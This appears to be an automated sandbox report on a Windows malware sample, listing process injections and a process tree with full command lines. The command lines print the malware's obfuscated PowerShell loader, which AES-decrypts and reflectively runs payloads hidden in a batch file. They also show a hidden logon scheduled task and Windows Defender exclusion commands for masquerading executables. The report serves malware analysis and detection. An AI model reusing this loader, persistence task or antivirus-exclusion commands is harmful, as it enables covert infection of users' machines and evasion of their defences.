PID 620 wrote to memory of 2884 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 5032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 2036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 4376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1328 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 3356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
PID 620 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
PID 620 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
PID 620 wrote to memory of 4996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Output.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Local\Temp\Output.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_962_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1

C:\Windows\system32\msdt.exe

-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"

C:\Windows\System32\sdiagnhost.exe

C:\Windows\System32\sdiagnhost.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe

"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\ImmersiveControlPanel\SystemSettings.exe

"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\rundll32.exe

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1

C:\Windows\ImmersiveControlPanel\SystemSettings.exe

"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

